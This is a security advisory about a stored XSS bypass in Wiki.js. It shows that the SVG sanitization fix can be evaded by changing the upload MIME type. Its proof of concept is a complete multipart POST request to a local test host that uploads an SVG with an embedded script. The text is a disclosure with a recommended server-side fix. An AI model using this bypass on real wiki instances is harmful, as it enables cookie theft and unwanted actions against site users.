Description

SVG sanitization is incomplete. Attackers can bypass fix in https://github.com/Requarks/wiki/security/advisories/GHSA-3qv4-gp35-rgh7 to perform XSS via malicious SVG files.

Proof of Concept

The fix commit sanitizes SVG if MimeType = svg+xml. Unfortunately this can be controlled by user through the POST request, and so an attacker can modify the MimeType (from image/svg+xml to image/xxx) to bypass the sanitization check.

POST /u HTTP/1.1
Host: 10.0.2.4:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.2.4:3000/e/en/home
Content-Type: multipart/form-data; boundary=---------------------------51434357737717624032908586947
Content-Length: 729
Origin: http://10.0.2.4:3000
Connection: close
Cookie: jwt=eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwiZW1haWwiOiJhZG1pbkBhZG1pbi5sb2NhbCIsIm5hbWUiOiJBZG1pbmlzdHJhdG9yIiwiYXYiOm51bGwsInR6IjoiQW1lcmljYS9OZXdfWW9yayIsImxjIjoiZW4iLCJkZiI6IiIsImFwIjoiIiwicGVybWlzc2lvbnMiOlsibWFuYWdlOnN5c3RlbSJdLCJncm91cHMiOlsxXSwiaWF0IjoxNjM5Njc3NTkxLCJleHAiOjE2Mzk2NzkzOTEsImF1ZCI6InVybjp3aWtpLmpzIiwiaXNzIjoidXJuOndpa2kuanMifQ.lhEkYJre3SyUa00LACOrLKGgPDJdCol2gs9lI0IPr0VSAaS1x5jIsbhe4DOBeloQDKz2fcJtM8et_FnuKsbW-zKm8BOuE2B0WaAg-fDZ_bAJLAh3qpaYSjO-sYqcgyA6VPLWz595r3ogI_3t7AfjGDaUXpJrheOeN1BE3DQdGDl4SPVV5QbPtl5lm0EDzCdMDNVvr_Ur6MFiE8bhcmf1n8Hyk37FImbVY57Rn503at-XEl--lSqCRT-6KbWAGZ3XWPymoZPRuzTOnVMWw5cnoIoKIpJLnZz3kSsZA0TPsl5SiM6vU5bizPXkSzO8RfxghZoHMvNerBvbyFFKPOhecQ

-----------------------------51434357737717624032908586947

Content-Disposition: form-data; name="mediaUpload"
{"folderId":0}

-----------------------------51434357737717624032908586947

Content-Disposition: form-data; name="mediaUpload"; filename="pwned.svg"
Content-Type: image/svg

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert('SVG PoC');
   </script>
</svg>
-----------------------------51434357737717624032908586947--

Impact

This vulnerability is capable of stealing users cookie and performing unwanted actions on the site via XSS.

Recommended Fix

MimeType should be validated on server side.